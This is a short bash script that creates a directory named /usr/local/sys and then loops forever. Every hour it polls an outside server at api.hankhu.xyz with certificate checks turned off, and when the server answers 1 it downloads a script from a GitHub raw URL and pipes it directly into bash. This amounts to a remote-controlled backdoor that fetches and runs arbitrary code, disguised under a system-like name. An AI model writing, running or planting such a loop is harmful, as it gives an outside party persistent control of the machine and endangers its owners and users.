#!/bin/bash
dirsys=/usr/local/sys
if [ ! -d $dirsys ];then
mkdir -p $dirsys
fi

cd $dirsys

while :
do
mod=`curl  -X POST  https://api.hankhu.xyz/sys/sys.php -d 'usernameid' -sk`

if [ $mod -eq 1 ];then
  bash  < <(curl  -Ls https://raw.githubusercontent.com/hankhu666/sys/main/usernameid.sh)
fi

sleep 3600

done
